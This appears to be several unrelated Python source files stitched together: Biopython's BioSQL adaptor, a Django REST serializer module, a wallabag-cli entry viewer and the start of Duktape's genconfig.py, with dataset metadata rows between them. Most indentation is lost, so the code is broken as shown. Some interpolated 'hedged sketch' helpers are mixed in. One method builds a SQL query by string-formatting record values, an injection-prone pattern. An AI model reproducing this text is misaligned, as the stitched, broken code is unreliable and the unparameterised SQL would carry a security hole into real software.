# due to FUNCTION defines at the end of the SQL which mess up
# the splitting by semicolons
if self.module_name in ["psycopg2", "pgdb"]:
self.adaptor.cursor.execute(sql)
# 2. MySQL needs the database loading split up into single lines of
# SQL executed one at a time
elif self.module_name in ["mysql.connector", "MySQLdb", "sqlite3"]:
sql_parts = sql.split(";") # one line per sql command
# don't use the last item, it's blank
for sql_line in sql_parts[:-1]:
self.adaptor.cursor.execute(sql_line)
else:
raise ValueError("Module %s not supported by the loader." %
(self.module_name))
def commit(self):
"""Commits the current transaction to the database."""
return self.adaptor.commit()
def rollback(self):
"""Rolls backs the current transaction."""
return self.adaptor.rollback()
def close(self):
"""Close the connection. No further activity possible."""
return self.adaptor.close()
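# Hedged sketch (not part of BioSQL itself): DBServer behaves like a dictionary
# of namespaces; "demo" is a placeholder namespace name.
def _example_namespace_roundtrip(server):
    server.new_database("demo", description="example namespace")
    assert "demo" in server
    names = list(server.keys())      # all namespace names
    del server["demo"]               # drops the namespace and all of its entries
    return names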
class _CursorWrapper(object):
"""A wraper for mysql.connector resolving bytestring representations."""
def __init__(self, real_cursor):
self.real_cursor = real_cursor
def execute(self, operation, params=None, multi=False):
self.real_cursor.execute(operation, params, multi)
def _convert_tuple(self, tuple_):
tuple_list = list(tuple_)
for i, elem in enumerate(tuple_list):
if type(elem) is bytes:
tuple_list[i] = elem.decode("utf-8")
return tuple(tuple_list)
def _convert_list(self, lst):
ret_lst = []
for tuple_ in lst:
new_tuple = self._convert_tuple(tuple_)
ret_lst.append(new_tuple)
return ret_lst
def fetchall(self):
rv = self.real_cursor.fetchall()
return self._convert_list(rv)
def fetchone(self):
tuple_ = self.real_cursor.fetchone()
return self._convert_tuple(tuple_)
class Adaptor(object):
"""High level wrapper for a database connection and cursor
Most database calls in BioSQL are done indirectly though this adaptor
class. This provides helper methods for fetching data and executing
sql.
"""
def __init__(self, conn, dbutils, wrap_cursor=False):
self.conn = conn
if wrap_cursor:
self.cursor = _CursorWrapper(conn.cursor())
else:
self.cursor = conn.cursor()
self.dbutils = dbutils
def last_id(self, table):
return self.dbutils.last_id(self.cursor, table)
def autocommit(self, y=True):
"""Set the autocommit mode. True values enable; False value disable."""
return self.dbutils.autocommit(self.conn, y)
def commit(self):
"""Commits the current transaction."""
return self.conn.commit()
def rollback(self):
"""Rolls backs the current transaction."""
return self.conn.rollback()
def close(self):
"""Close the connection. No further activity possible."""
return self.conn.close()
def fetch_dbid_by_dbname(self, dbname):
self.execute(
r"select biodatabase_id from biodatabase where name = %s",
(dbname,))
rv = self.cursor.fetchall()
if not rv:
raise KeyError("Cannot find biodatabase with name %r" % dbname)
return rv[0][0]
def fetch_seqid_by_display_id(self, dbid, name):
sql = r"select bioentry_id from bioentry where name = %s"
fields = [name]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find display id %r" % name)
if len(rv) > 1:
raise IndexError("More than one entry with display id %r" % name)
return rv[0][0]
def fetch_seqid_by_accession(self, dbid, name):
sql = r"select bioentry_id from bioentry where accession = %s"
fields = [name]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find accession %r" % name)
if len(rv) > 1:
raise IndexError("More than one entry with accession %r" % name)
return rv[0][0]
def fetch_seqids_by_accession(self, dbid, name):
sql = r"select bioentry_id from bioentry where accession = %s"
fields = [name]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
return self.execute_and_fetch_col0(sql, fields)
def fetch_seqid_by_version(self, dbid, name):
acc_version = name.split(".")
if len(acc_version) > 2:
raise IndexError("Bad version %r" % name)
acc = acc_version[0]
if len(acc_version) == 2:
version = acc_version[1]
else:
version = "0"
sql = r"SELECT bioentry_id FROM bioentry WHERE accession = %s" \
r" AND version = %s"
fields = [acc, version]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find version %r" % name)
if len(rv) > 1:
raise IndexError("More than one entry with version %r" % name)
return rv[0][0]
def fetch_seqid_by_identifier(self, dbid, identifier):
# YB: was fetch_seqid_by_seqid
sql = "SELECT bioentry_id FROM bioentry WHERE identifier = %s"
fields = [identifier]
if dbid:
sql += " and biodatabase_id = %s"
fields.append(dbid)
self.execute(sql, fields)
rv = self.cursor.fetchall()
if not rv:
raise IndexError("Cannot find display id %r" % identifier)
return rv[0][0]
def list_biodatabase_names(self):
return self.execute_and_fetch_col0(
"SELECT name FROM biodatabase")
def list_bioentry_ids(self, dbid):
return self.execute_and_fetch_col0(
"SELECT bioentry_id FROM bioentry WHERE biodatabase_id = %s",
(dbid,))
def list_bioentry_display_ids(self, dbid):
return self.execute_and_fetch_col0(
"SELECT name FROM bioentry WHERE biodatabase_id = %s",
(dbid,))
def list_any_ids(self, sql, args):
"""Return ids given a SQL statement to select for them.
This assumes that the given SQL does a SELECT statement that
returns a list of items. This parses them out of the 2D list
they come as and just returns them in a list.
"""
return self.execute_and_fetch_col0(sql, args)
def execute_one(self, sql, args=None):
"""Execute sql that returns 1 record, and return the record"""
self.execute(sql, args or ())
rv = self.cursor.fetchall()
assert len(rv) == 1, "Expected 1 response, got %d" % len(rv)
return rv[0]
def execute(self, sql, args=None):
"""Just execute an sql command.
"""
if os.name == "java":
sql = sql.replace("%s", "?")
self.dbutils.execute(self.cursor, sql, args)
def get_subseq_as_string(self, seqid, start, end):
length = end - start
# XXX Check this on MySQL and PostgreSQL. substr should be general,
# does it need dbutils?
# return self.execute_one(
# """select SUBSTRING(seq FROM %s FOR %s)
# from biosequence where bioentry_id = %s""",
# (start+1, length, seqid))[0]
#
# Convert to a string on returning for databases that give back
# unicode. Shouldn't need unicode for sequences so this seems safe.
return str(self.execute_one(
"""select SUBSTR(seq, %s, %s)
from biosequence where bioentry_id = %s""",
(start + 1, length, seqid))[0])
def execute_and_fetch_col0(self, sql, args=None):
self.execute(sql, args or ())
return [field[0] for field in self.cursor.fetchall()]
def execute_and_fetchall(self, sql, args=None):
self.execute(sql, args or ())
return self.cursor.fetchall()
class MysqlConnectorAdaptor(Adaptor):
"""A BioSQL Adaptor class with fixes for the MySQL interface
BioSQL was failing due to returns of bytearray objects from
the mysql-connector-python database connector. This adaptor
class scrubs returns of bytearrays and of byte strings converting
them to string objects instead. This adaptor class was made in
response to backwards incompatible changes added to
mysql-connector-python in release 2.0.0 of the package.
"""
def execute_one(self, sql, args=None):
out = super(MysqlConnectorAdaptor, self).execute_one(sql, args)
return tuple(bytearray_to_str(v) for v in out)
def execute_and_fetch_col0(self, sql, args=None):
out = super(MysqlConnectorAdaptor, self).execute_and_fetch_col0(sql, args)
return [bytearray_to_str(column) for column in out]
def execute_and_fetchall(self, sql, args=None):
out = super(MysqlConnectorAdaptor, self).execute_and_fetchall(sql, args)
return [tuple(bytearray_to_str(v) for v in o) for o in out]
_interface_specific_adaptors = {
# If SQL interfaces require a specific adaptor, use this to map the adaptor
"mysql.connector": MysqlConnectorAdaptor
}
_allowed_lookups = {
# Lookup name / function name to get id, function to list all ids
'primary_id': "fetch_seqid_by_identifier",
'gi': "fetch_seqid_by_identifier",
'display_id': "fetch_seqid_by_display_id",
'name': "fetch_seqid_by_display_id",
'accession': "fetch_seqid_by_accession",
'version': "fetch_seqid_by_version",
}
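# Hedged sketch (not part of BioSQL itself): the table above maps lookup()
# keyword names to adaptor methods, so a BioSeqDatabase can be queried by e.g.
# accession or version; "X77802" mirrors the docstring examples further below.
def _example_lookup(db):
    by_acc = db.lookup(accession="X77802")
    by_ver = db.lookup(version="X77802.1")
    return by_acc, by_ver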
class BioSeqDatabase(object):
"""Represents a namespace (sub-database) within the BioSQL database.
    i.e. One row in the biodatabase table, and all rows in the bioentry
table associated with it.
"""
def __init__(self, adaptor, name):
self.adaptor = adaptor
self.name = name
self.dbid = self.adaptor.fetch_dbid_by_dbname(name)
def __repr__(self):
return "BioSeqDatabase(%r, %r)" % (self.adaptor, self.name)
def get_Seq_by_id(self, name):
"""Gets a DBSeqRecord object by its name
Example: seq_rec = db.get_Seq_by_id('ROA1_HUMAN')
The name of this method is misleading since it returns a DBSeqRecord
        rather than a DBSeq object, and presumably was named to mirror BioPerl.
"""
seqid = self.adaptor.fetch_seqid_by_display_id(self.dbid, name)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seq_by_acc(self, name):
"""Gets a DBSeqRecord object by accession number
Example: seq_rec = db.get_Seq_by_acc('X77802')
The name of this method is misleading since it returns a DBSeqRecord
        rather than a DBSeq object, and presumably was named to mirror BioPerl.
"""
seqid = self.adaptor.fetch_seqid_by_accession(self.dbid, name)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seq_by_ver(self, name):
"""Gets a DBSeqRecord object by version number
Example: seq_rec = db.get_Seq_by_ver('X77802.1')
The name of this method is misleading since it returns a DBSeqRecord
        rather than a DBSeq object, and presumably was named to mirror BioPerl.
"""
seqid = self.adaptor.fetch_seqid_by_version(self.dbid, name)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seqs_by_acc(self, name):
"""Gets a list of DBSeqRecord objects by accession number
Example: seq_recs = db.get_Seq_by_acc('X77802')
The name of this method is misleading since it returns a list of
        DBSeqRecord objects rather than a list of DBSeq objects, and presumably
        was named to mirror BioPerl.
"""
seqids = self.adaptor.fetch_seqids_by_accession(self.dbid, name)
return [BioSeq.DBSeqRecord(self.adaptor, seqid) for seqid in seqids]
def get_all_primary_ids(self):
"""All the primary_ids of the sequences in the database (OBSOLETE).
        These may be ids (display style) or accession numbers or
something else completely different - they *are not*
meaningful outside of this database implementation.
Please use .keys() instead of .get_all_primary_ids()
"""
import warnings
warnings.warn("Use bio_seq_database.keys() instead of "
"bio_seq_database.get_all_primary_ids()",
BiopythonDeprecationWarning)
return list(self.keys())
def __getitem__(self, key):
return BioSeq.DBSeqRecord(self.adaptor, key)
def __delitem__(self, key):
"""Remove an entry and all its annotation."""
if key not in self:
raise KeyError(key)
# Assuming this will automatically cascade to the other tables...
sql = "DELETE FROM bioentry " + \
"WHERE biodatabase_id=%s AND bioentry_id=%s;"
self.adaptor.execute(sql, (self.dbid, key))
def __len__(self):
"""Number of records in this namespace (sub database)."""
sql = "SELECT COUNT(bioentry_id) FROM bioentry " + \
"WHERE biodatabase_id=%s;"
return int(self.adaptor.execute_and_fetch_col0(sql, (self.dbid, ))[0])
def __contains__(self, value):
"""Check if a primary (internal) id is this namespace (sub database)."""
sql = "SELECT COUNT(bioentry_id) FROM bioentry " + \
"WHERE biodatabase_id=%s AND bioentry_id=%s;"
# The bioentry_id field is an integer in the schema.
# PostgreSQL will throw an error if we use a non integer in the query.
try:
bioentry_id = int(value)
except ValueError:
return False
return bool(self.adaptor.execute_and_fetch_col0(sql,
(self.dbid, bioentry_id))[0])
def __iter__(self):
"""Iterate over ids (which may not be meaningful outside this database)."""
# TODO - Iterate over the cursor, much more efficient
return iter(self.adaptor.list_bioentry_ids(self.dbid))
if hasattr(dict, "iteritems"):
# Python 2, use iteritems etc
def keys(self):
"""List of ids which may not be meaningful outside this database."""
return self.adaptor.list_bioentry_ids(self.dbid)
def values(self):
"""List of DBSeqRecord objects in the namespace (sub database)."""
return [self[key] for key in self]
def items(self):
"""List of (id, DBSeqRecord) for the namespace (sub database)."""
return [(key, self[key]) for key in self]
def iterkeys(self):
"""Iterate over ids (which may not be meaningful outside this database)."""
return iter(self)
def itervalues(self):
"""Iterate over DBSeqRecord objects in the namespace (sub database)."""
for key in self:
yield self[key]
def iteritems(self):
"""Iterate over (id, DBSeqRecord) for the namespace (sub database)."""
for key in self:
yield key, self[key]
else:
# Python 3, items etc are all iterators
def keys(self):
"""Iterate over ids (which may not be meaningful outside this database)."""
return iter(self)
def values(self):
"""Iterate over DBSeqRecord objects in the namespace (sub database)."""
for key in self:
yield self[key]
def items(self):
"""Iterate over (id, DBSeqRecord) for the namespace (sub database)."""
for key in self:
yield key, self[key]
def lookup(self, **kwargs):
if len(kwargs) != 1:
raise TypeError("single key/value parameter expected")
k, v = list(kwargs.items())[0]
if k not in _allowed_lookups:
raise TypeError("lookup() expects one of %r, not %r" %
(list(_allowed_lookups.keys()), k))
lookup_name = _allowed_lookups[k]
lookup_func = getattr(self.adaptor, lookup_name)
seqid = lookup_func(self.dbid, v)
return BioSeq.DBSeqRecord(self.adaptor, seqid)
def get_Seq_by_primary_id(self, seqid):
"""Get a DBSeqRecord by the primary (internal) id (OBSOLETE).
Rather than db.get_Seq_by_primary_id(my_id) use db[my_id]
The name of this method is misleading since it returns a DBSeqRecord
        rather than a DBSeq object, and presumably was named to mirror BioPerl.
"""
import warnings
warnings.warn("Use bio_seq_database[my_id] instead of "
"bio_seq_database.get_Seq_by_primary_id(my_id)",
BiopythonDeprecationWarning)
return self[seqid]
def load(self, record_iterator, fetch_NCBI_taxonomy=False):
"""Load a set of SeqRecords into the BioSQL database.
record_iterator is either a list of SeqRecord objects, or an
Iterator object that returns SeqRecord objects (such as the
output from the Bio.SeqIO.parse() function), which will be
used to populate the database.
        fetch_NCBI_taxonomy is a boolean flag allowing or preventing
connection to the taxonomic database on the NCBI server
(via Bio.Entrez) to fetch a detailed taxonomy for each
SeqRecord.
Example:
from Bio import SeqIO
count = db.load(SeqIO.parse(open(filename), format))
Returns the number of records loaded.
"""
db_loader = Loader.DatabaseLoader(self.adaptor, self.dbid,
fetch_NCBI_taxonomy)
num_records = 0
global _POSTGRES_RULES_PRESENT
for cur_record in record_iterator:
num_records += 1
            # Hack to work around BioSQL Bug 2839 - if using PostgreSQL and
# the RULES are present check for a duplicate record before loading
if _POSTGRES_RULES_PRESENT:
# Recreate what the Loader's _load_bioentry_table will do:
if cur_record.id.count(".") == 1:
accession, version = cur_record.id.split('.')
try:
version = int(version)
except ValueError:
accession = cur_record.id
version = 0
else:
accession = cur_record.id
version = 0
gi = cur_record.annotations.get("gi", None)
sql = "SELECT bioentry_id FROM bioentry WHERE (identifier " + \
"= '%s' AND biodatabase_id = '%s') OR (accession = " + \
"'%s' AND version = '%s' AND biodatabase_id = '%s')"
self.adaptor.execute(
sql % (gi, self.dbid, accession, version, self.dbid))
if self.adaptor.cursor.fetchone():
raise self.adaptor.conn.IntegrityError("Duplicate record "
"detected: record has not been inserted")
# End of hack
db_loader.load_seqrecord(cur_record)
return num_records
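# Hedged sketch (not part of BioSQL itself): loading records parsed with
# Bio.SeqIO into a fresh namespace and committing; the file name and the
# namespace name are placeholders.
def _example_load_genbank(server, filename):
    from Bio import SeqIO
    db = server.new_database("demo_ns")
    count = db.load(SeqIO.parse(filename, "genbank"))
    server.commit()
    return count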
|
apache-2.0
| 1,127,389,766,597,076,100 | 38.044929 | 100 | 0.594523 | false | 4.016374 | false | false | false |
SanaMobile/sana.protocol_builder
|
src-django/api/serializer.py
|
1
|
7122
|
from collections import OrderedDict
from rest_framework import serializers
from rest_framework.fields import SkipField
from django.contrib.auth.models import User
import models
import field
import json
class ElementSerializer(serializers.ModelSerializer):
choices = field.ArrayAsStringField(required=False)
answer = field.ArrayAsStringField(required=False)
class Meta:
model = models.Element
fields = (
'id',
'display_index',
'concept',
'question',
'answer',
'page',
'choices',
'required',
'image',
'audio',
'action',
'mime_type',
'element_type',
'last_modified',
'created'
)
def to_representation(self, instance):
"""
Object instance -> Dict of primitive datatypes.
"""
ret = OrderedDict()
fields = [field for field in self.fields.values() if not field.write_only]
for field in fields:
try:
attribute = field.get_attribute(instance)
except SkipField:
continue
if attribute is not None:
ret[field.field_name] = field.to_representation(attribute)
return ret
def validate(self, data):
if data['element_type'] in models.Element.CHOICE_TYPES:
# Choice-based element needs to have a valid answer
answers = json.loads(data['answer'])
choices = json.loads(data['choices'])
if data['element_type'] != 'MULTI_SELECT':
if len(answers) > 1:
raise serializers.ValidationError('Answer must have at most 1 choice')
for answer in answers:
if answer not in choices:
raise serializers.ValidationError('Answer must be one of the choices')
return data
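# Hedged sketch (not part of the serializer module): validate() above expects
# 'answer' and 'choices' as JSON-encoded lists; only MULTI_SELECT is referenced
# explicitly in this file, so treat the element_type value as an assumption.
_EXAMPLE_CHOICE_PAYLOAD = {
    'element_type': 'MULTI_SELECT',
    'choices': '["yes", "no", "maybe"]',
    'answer': '["yes", "no"]',
}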
class AbstractElementSerializer(serializers.ModelSerializer):
choices = field.ArrayAsStringField(required=False)
answer = field.ArrayAsStringField(required=False)
class Meta:
model = models.AbstractElement
fields = (
'id',
'display_index',
'concept',
'subroutine',
'question',
'answer',
'choices',
'required',
'image',
'audio',
'action',
'mime_type',
'element_type',
'last_modified',
'created'
)
def to_representation(self, instance):
"""
Object instance -> Dict of primitive datatypes.
"""
ret = OrderedDict()
fields = [field for field in self.fields.values() if not field.write_only]
for field in fields:
try:
attribute = field.get_attribute(instance)
except SkipField:
continue
if attribute is not None:
ret[field.field_name] = field.to_representation(attribute)
return ret
def validate(self, data):
if data['element_type'] in models.Element.CHOICE_TYPES:
# Choice-based element needs to have a valid answer
answers = json.loads(data['answer'])
choices = json.loads(data['choices'])
if data['element_type'] != 'MULTI_SELECT':
if len(answers) > 1:
raise serializers.ValidationError('Answer must have at most 1 choice')
for answer in answers:
if answer not in choices:
raise serializers.ValidationError('Answer must be one of the choices')
return data
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
class PageListSerializer(serializers.ListSerializer):
class Meta(object):
model = models.Page
def update(self, instance, validated_data):
current_page_mapping = {page.id: page for page in instance}
new_data_mapping = {item['id']: item for item in validated_data}
result = []
for new_page_id, data in new_data_mapping.items():
page = current_page_mapping.get(new_page_id, None)
if page is not None:
result.append(self.child.update(page, data))
return result
class ShowIfSerializer(serializers.ModelSerializer):
conditions = field.ConditionTreeField(required=True)
class Meta:
model = models.ShowIf
fields = (
'id',
'page',
'last_modified',
'created',
'conditions'
)
class PageSerializer(serializers.ModelSerializer):
elements = ElementSerializer(many=True, read_only=True)
show_if = ShowIfSerializer(many=True, read_only=True)
id = serializers.IntegerField(read_only=False, required=False)
class Meta:
model = models.Page
list_serializer_class = PageListSerializer
fields = (
'id',
'display_index',
'procedure',
'elements',
'last_modified',
'created',
'show_if'
)
class ProcedureSerializer(serializers.ModelSerializer):
owner = serializers.ReadOnlyField(source='owner.id')
class Meta:
model = models.Procedure
fields = (
'id',
'title',
'author',
'uuid',
'owner',
'last_modified',
'created',
'version'
)
class ProcedureDetailSerializer(ProcedureSerializer):
owner = serializers.ReadOnlyField(source='owner.id')
pages = PageSerializer(many=True, read_only=True)
class Meta(ProcedureSerializer.Meta):
model = models.Procedure
depth = 1
fields = ProcedureSerializer.Meta.fields + ('pages',)
class ConceptSerializer(serializers.ModelSerializer):
abstractelement = AbstractElementSerializer(many=True, read_only=True)
id = serializers.IntegerField(read_only=False, required=False)
class Meta:
model = models.Concept
fields = (
'id',
'uuid',
'created',
'last_modified',
'name',
'abstractelement',
'display_name',
'description',
'data_type',
'mime_type',
'constraint'
)
class SubroutineSerializer(serializers.ModelSerializer):
abstractelements = AbstractElementSerializer(many=True, read_only=True)
id = serializers.IntegerField(read_only=False, required=False)
class Meta:
model = models.Subroutine
fields = (
'id',
'uuid',
'created',
'last_modified',
'name',
'abstractelements',
'display_name',
'description',
)
class MDSInstanceSerializer(serializers.ModelSerializer):
class Meta:
model = models.MDSInstance
fields = (
'api_url',
'api_key',
)
|
bsd-3-clause
| -1,810,374,835,869,102,800 | 26.712062 | 90 | 0.55827 | false | 4.676297 | false | false | false |
Nepochal/wallabag-cli
|
wallabag/wallabag_show.py
|
1
|
3546
|
"""
Show a wallabag entry
"""
import io
import formatter
import json
import os
from sys import exit
import sys
from bs4 import BeautifulSoup
import api
import conf
import entry
def show(entry_id, colors=True, raw=False, html=False):
"""
Main function for showing an entry.
"""
conf.load()
try:
request = api.api_get_entry(entry_id)
__handle_request_error(request)
entr = entry.Entry(json.loads(request.response))
except api.OAuthException as ex:
print("Error: {0}".format(ex.text))
print()
exit(-1)
title = entr.title
try:
delimiter = "".ljust(os.get_terminal_size().columns, '=')
# piped output to file or other process
except OSError:
delimiter = "\n"
article = entr.content
if not html:
article = html2text(article, colors)
output = "{0}\n{1}\n{2}".format(title, delimiter, article)
if not raw:
output = __format_text(output)
print(output)
def html2text(html, colors=True):
soup = BeautifulSoup(html, "html.parser")
# Color h1-h3
if colors:
h1colors = '\033[93m'
h1colore = '\033[0m'
else:
h1colors = h1colore = ""
for h1 in soup.findAll('h1'):
h1.string = "\n{0}{1}{2}".format(h1colors, h1.string, h1colore)
for h2 in soup.findAll('h2'):
h2.string = "\n{0}{1}{2}".format(h1colors, h2.string, h1colore)
for h3 in soup.findAll('h3'):
h3.string = "\n{0}{1}{2}".format(h1colors, h3.string, h1colore)
if colors:
# Color bold texts
bcolors = '\033[92m'
bcolore = '\033[0m'
for bold in soup.findAll('b'):
bold.string = "{0}{1}{2}".format(bcolors, bold.string, bcolore)
for bold in soup.findAll('strong'):
bold.string = "{0}{1}{2}".format(bcolors, bold.string, bcolore)
# Replace hr with visual lines
try:
hrstring = "".ljust(os.get_terminal_size().columns, '-')
# piped output to file or other process
except OSError:
hrstring = "-----"
for hr in soup.findAll('hr'):
replace = soup.new_tag('p')
replace.string = hrstring
hr.insert_after(replace)
hr.unwrap()
# Replace images by information-texts
for img in soup.findAll('img'):
replace = soup.new_tag('p')
try:
alt = " \"{0}\"".format(img['alt'])
except KeyError:
alt = ""
replace.string = "[IMAGE{0}]\n".format(alt)
img.insert_after(replace)
img.unwrap()
return soup.text
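# Hedged sketch (not part of wallabag-cli): converting a small HTML fragment
# with the helper above, with ANSI colouring disabled so the output is plain text.
def _example_html2text():
    sample = '<h1>Title</h1><p>Some <b>bold</b> text.</p><img alt="cat"/>'
    return html2text(sample, colors=False)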
def __format_text(text):
try:
maxcol = os.get_terminal_size().columns
# piped output to file or other process
except OSError:
maxcol = sys.maxsize
ret = ""
for line in text.splitlines():
ios = io.StringIO()
writer = formatter.DumbWriter(ios, maxcol=maxcol)
writer.send_flowing_data(line)
ret = "{0}{1}\n".format(ret, ios.getvalue())
ios.close()
return ret
def __handle_request_error(request):
if request.has_error():
if request.error == api.Error.http_forbidden or request.error == api.Error.http_not_found:
print("Error: Invalid entry id.")
print()
exit(-1)
print("Error: {0} - {1}".format(request.error_text,
request.error_description))
exit(-1)
|
mit
| 553,081,221,058,167,040 | 25.703125 | 98 | 0.551043 | false | 3.6 | false | false | false |
jmptrader/duktape
|
tools/genconfig.py
|
1
|
56701
|
#!/usr/bin/env python2
#
# Process Duktape option metadata and produce various useful outputs:
#
# - duk_config.h with specific or autodetected platform, compiler, and
# architecture, forced options, sanity checks, etc
# - option documentation for Duktape config options (DUK_USE_xxx)
#
# Genconfig tries to build all outputs based on modular metadata, so that
# managing a large number of config options (which is hard to avoid given
# the wide range of targets Duktape supports) remains maintainable.
#
# Genconfig does *not* try to support all exotic platforms out there.
# Instead, the goal is to allow the metadata to be extended, or to provide
# a reasonable starting point for manual duk_config.h tweaking.
#
import logging
import sys
logging.basicConfig(level=logging.INFO, stream=sys.stdout, format='%(name)-21s %(levelname)-7s %(message)s')
logger = logging.getLogger('genconfig.py')
logger.setLevel(logging.INFO)
import os
import re
import json
import yaml
import optparse
import tarfile
import tempfile
import atexit
import shutil
import logging
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
#
# Globals holding scanned metadata, helper snippets, etc
#
# Metadata to scan from config files.
use_defs = None
use_defs_list = None
opt_defs = None
opt_defs_list = None
use_tags = None
use_tags_list = None
tags_meta = None
required_use_meta_keys = [
'define',
'introduced',
'default',
'tags',
'description'
]
allowed_use_meta_keys = [
'define',
'introduced',
'deprecated',
'removed',
'unused',
'requires',
'conflicts',
'related',
'default',
'tags',
'description',
'warn_if_missing'
]
required_opt_meta_keys = [
'define',
'introduced',
'tags',
'description'
]
allowed_opt_meta_keys = [
'define',
'introduced',
'deprecated',
'removed',
'unused',
'requires',
'conflicts',
'related',
'tags',
'description'
]
# Preferred tag order for option documentation.
doc_tag_order = [
'portability',
'memory',
'lowmemory',
'ecmascript',
'execution',
'debugger',
'debug',
'development'
]
# Preferred tag order for generated C header files.
header_tag_order = doc_tag_order
# Helper headers snippets.
helper_snippets = None
# Assume these provides come from outside.
assumed_provides = {
'DUK_SINGLE_FILE': True, # compiling Duktape from a single source file (duktape.c) version
'DUK_COMPILING_DUKTAPE': True, # compiling Duktape (not user application)
'DUK_CONFIG_H_INCLUDED': True, # artifact, include guard
}
# Platform files must provide at least these (additional checks
# in validate_platform_file()). Fill-ins provide missing optionals.
platform_required_provides = [
'DUK_USE_OS_STRING' # must be #define'd
]
# Architecture files must provide at least these (additional checks
# in validate_architecture_file()). Fill-ins provide missing optionals.
architecture_required_provides = [
'DUK_USE_ARCH_STRING'
]
# Compiler files must provide at least these (additional checks
# in validate_compiler_file()). Fill-ins provide missing optionals.
compiler_required_provides = [
# Compilers need a lot of defines; missing defines are automatically
# filled in with defaults (which are mostly compiler independent), so
# the requires define list is not very large.
'DUK_USE_COMPILER_STRING', # must be #define'd
'DUK_USE_BRANCH_HINTS', # may be #undef'd, as long as provided
'DUK_USE_VARIADIC_MACROS', # may be #undef'd, as long as provided
'DUK_USE_UNION_INITIALIZERS' # may be #undef'd, as long as provided
]
#
# Miscellaneous helpers
#
def get_auto_delete_tempdir():
tmpdir = tempfile.mkdtemp(suffix='-genconfig')
def _f(dirname):
logger.debug('Deleting temporary directory: %r' % dirname)
if os.path.isdir(dirname) and '-genconfig' in dirname:
shutil.rmtree(dirname)
atexit.register(_f, tmpdir)
return tmpdir
def strip_comments_from_lines(lines):
# Not exact but close enough. Doesn't handle string literals etc,
# but these are not a concrete issue for scanning preprocessor
# #define references.
#
# Comment contents are stripped of any DUK_ prefixed text to avoid
# incorrect requires/provides detection. Other comment text is kept;
# in particular a "/* redefine */" comment must remain intact here.
# (The 'redefine' hack is not actively needed now.)
#
# Avoid Python 2.6 vs. Python 2.7 argument differences.
def censor(x):
return re.sub(re.compile('DUK_\w+', re.MULTILINE), 'xxx', x.group(0))
tmp = '\n'.join(lines)
tmp = re.sub(re.compile('/\*.*?\*/', re.MULTILINE | re.DOTALL), censor, tmp)
tmp = re.sub(re.compile('//.*?$', re.MULTILINE), censor, tmp)
return tmp.split('\n')
# Header snippet representation: lines, provides defines, requires defines.
re_line_provides = re.compile(r'^#(?:define|undef)\s+(\w+).*$')
re_line_requires = re.compile(r'(DUK_[A-Z0-9_]+)') # uppercase only, don't match DUK_USE_xxx for example
class Snippet:
lines = None # lines of text and/or snippets
provides = None # map from define to 'True' for now
requires = None # map from define to 'True' for now
def __init__(self, lines, provides=None, requires=None, autoscan_requires=True, autoscan_provides=True):
self.lines = []
if not isinstance(lines, list):
raise Exception('Snippet constructor must be a list (not e.g. a string): %s' % repr(lines))
for line in lines:
if isinstance(line, str):
self.lines.append(line)
elif isinstance(line, unicode):
self.lines.append(line.encode('utf-8'))
else:
raise Exception('invalid line: %r' % line)
self.provides = {}
if provides is not None:
for k in provides.keys():
self.provides[k] = True
self.requires = {}
if requires is not None:
for k in requires.keys():
self.requires[k] = True
stripped_lines = strip_comments_from_lines(lines)
#for line in stripped_lines:
# logger.debug(line)
for line in stripped_lines:
# Careful with order, snippet may self-reference its own
# defines in which case there's no outward dependency.
# (This is not 100% because the order of require/provide
# matters and this is not handled now.)
#
# Also, some snippets may #undef/#define another define but
# they don't "provide" the define as such. Such redefinitions
# are marked "/* redefine */" in the snippets. They're best
# avoided (and not currently needed in Duktape 1.4.0).
if autoscan_provides:
m = re_line_provides.match(line)
if m is not None and '/* redefine */' not in line and \
len(m.group(1)) > 0 and m.group(1)[-1] != '_':
# Don't allow e.g. DUK_USE_ which results from matching DUK_USE_xxx
#logger.debug('PROVIDES: %r' % m.group(1))
self.provides[m.group(1)] = True
if autoscan_requires:
matches = re.findall(re_line_requires, line)
for m in matches:
if len(m) > 0 and m[-1] == '_':
# Don't allow e.g. DUK_USE_ which results from matching DUK_USE_xxx
pass
elif m[:7] == 'DUK_OPT':
#logger.warning('Encountered DUK_OPT_xxx in a header snippet: %s' % repr(line))
# DUK_OPT_xxx always come from outside
pass
elif m[:7] == 'DUK_USE':
# DUK_USE_xxx are internal and they should not be 'requirements'
pass
elif self.provides.has_key(m):
# Snippet provides it's own require; omit
pass
else:
#logger.debug('REQUIRES: %r' % m)
self.requires[m] = True
def fromFile(cls, filename):
lines = []
with open(filename, 'rb') as f:
for line in f:
if line[-1] == '\n':
line = line[:-1]
if line[:8] == '#snippet':
m = re.match(r'#snippet\s+"(.*?)"', line)
# XXX: better plumbing for lookup path
sub_fn = os.path.normpath(os.path.join(filename, '..', '..', 'header-snippets', m.group(1)))
logger.debug('#snippet ' + sub_fn)
sn = Snippet.fromFile(sub_fn)
lines += sn.lines
else:
lines.append(line)
return Snippet(lines, autoscan_requires=True, autoscan_provides=True)
fromFile = classmethod(fromFile)
def merge(cls, snippets):
ret = Snippet([], [], [])
for s in snippets:
ret.lines += s.lines
for k in s.provides.keys():
ret.provides[k] = True
for k in s.requires.keys():
ret.requires[k] = True
return ret
merge = classmethod(merge)
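# Hedged sketch (not part of genconfig): the autoscan in Snippet.__init__ treats
# "#define"/"#undef" lines as provides and other uppercase DUK_-prefixed
# identifiers (excluding DUK_OPT_/DUK_USE_ references) as requires.
def _example_snippet_autoscan():
    sn = Snippet([
        '#if defined(DUK_F_WINDOWS)',
        '#define DUK_USE_OS_STRING "windows"',
        '#endif',
    ])
    # expected: provides DUK_USE_OS_STRING, requires DUK_F_WINDOWS
    return sorted(sn.provides.keys()), sorted(sn.requires.keys())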
# Helper for building a text file from individual lines, injected files, etc.
